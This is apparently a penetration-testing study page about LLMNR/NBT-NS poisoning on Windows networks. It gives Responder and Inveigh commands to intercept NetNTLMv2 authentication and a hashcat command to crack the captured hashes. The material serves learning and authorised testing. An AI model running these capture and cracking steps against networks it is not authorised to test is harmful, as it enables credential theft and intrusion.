🦢Getting a Foothold

LLMNR/NBT-NS

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows components that can serve as alternate methods of host identification should DNS fail. When LLMNR/NBT-NS are used for name resolution, this means that any host on the network can reply.

This is where we can use Responder to poison these requests. We can intercept the NetNTLM Challenge by using an MITM (Man-in-the-Middle) Attack by poisoning the response during NetNTLM Authentication, this tricks the client into talking to us instead of the real server they wanted to connect to.

Using Responder in Linux

Responder is extremely powerful and has many different functions available to use.

  • -A Analyze mode, allows us to see NBT-NS, BROWSER and LLMNR requests

  • -wf Start the WPAD rogue proxy server

  • -f Attempts to fingerprint the remote host OS and version

  • -v Increase verbosity

  • -F and -P Force NTLM or Basic authentication

Poisoning authentication challenges using Responder

sudo responder -I tun0 -dwP

Once started we should leave Responder to run for a while to maximize the amount of hashes we can obtain. In this case, we received back an SMBv2 connection and Responder extracted an NTLMv2_SSP Response. A log file will be created in the /usr/share/responder/logs directory this will include any captured hashes.

Cracking a NTLMv2 Hash with Hashcat

hashcat -m 5600 hash.txt password-list.txt --force

With a successfully cracked hash, we can begin to enumerate the domain further.

At this stage, it's best to attempt to crack as many hashes as possible to give us more leverage for later down the line.

Using Inveigh in Windows

It works similarly to Responder but is written in Powershell and C#. It can listen to IPv4/v6 and other protocols such as LLMNR, DNS, mDNS LDAP etc.

Using Inveigh in Powershell

Import-Module .\Inveigh.ps1
(Get-Command Invoke-Inveigh).Parameters

Starting Inveigh

Once we start the program we should see that we immediately start getting LLMNR and mDNS requests

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Using Inveight in C#

The Poweshell version is no longer updated but the C# version is.

.\Inveigh.exe

Once running we should see the options with a [+] are default and enabled and the options with a [] before they are disabled.

If we hit ESC we will enter an interactive console where we can enter commands.

Useful commands

  • HELP - Show a help screen with commands we can type

  • GET NTLMV2UNIQUE - Shows unique captured hashes

  • GET NTLMV2USERNAMES - See collected username

PreviousInitial EnumerationNextPassword Hunting and Gathering

Last updated

Was this helpful?